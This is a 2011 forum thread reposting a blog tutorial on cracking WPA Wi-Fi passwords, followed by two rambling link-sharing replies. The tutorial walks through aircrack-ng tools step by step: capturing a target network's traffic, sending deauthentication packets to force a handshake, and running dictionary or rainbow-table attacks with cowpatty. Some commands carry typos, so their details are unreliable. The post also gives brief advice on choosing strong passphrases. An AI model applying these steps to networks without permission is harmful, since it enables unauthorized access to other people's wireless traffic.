Iron Feather HQ : NOCH : CRUEL WYNDZ

Be ureself and trip on it!
https://ironfeather.com/bbs/

Hacking the WPA Airwaves By Bennet

https://ironfeather.com/bbs/viewtopic.php?f=11&t=584

Page 1 of 1

Hacking the WPA Airwaves By Bennet

Posted: Fri May 13, 2011 9:17 am
by Stevyn

Code: Select all

Hacking the WPA Airwaves
By
Bennet
" http://pauldotcom.com/2011/05/hacking-the-wpa-airwaves.html"

It is interesting how many people believe that their wireless is secure because they are using WPA. Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA usb antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

•close console window to see collection of packets
•use alt + k to get to top pull down menu's, turn on ability to see type of access points bsid and guess at IP address, channel #
Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c -bssid -w wlan0

Example:

airodump-ng -c 9 -bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0 * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng -a -c wlan0

Example:

airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the trafic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has alot of cell phones like the iphone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless ethernet card has a wake-up when the screen is activated. So you don't need to send de-auth all you got to do is hang around long enough for someone to touch their Iphone or whatever cell and have it wake up it's wireless and re-auth to the network, in other words there is the weakest link! -- LOL!

Happy Cracking

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY--I'm Out

~Mark Bennett
http://offensive-security.com/wpa-tables
offensive-security.com

Re: Hacking the WPA Airwaves By Bennet

Posted: Wed Jun 08, 2011 9:22 am
by Alexander Mundy
I am proud of you for keeping our internet see cure from cash and bandwidth grabbers,
like Google and Facebooger. Thanks.


here are some cool links

http://packetstormsecurity.org


http://www.c4i.org/

Re: Hacking the WPA Airwaves By Bennet

Posted: Sat Sep 03, 2011 4:40 am
by Alexander Mundy
Here's the site of an awesome org.

http://www.kateycharles.com/

They have contracts to send and wharehouse info for the largest school districts in the U.S.

They're perfect. No one can mess with the public schools or their teachers unions.

NO one.
All times are UTC+09:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/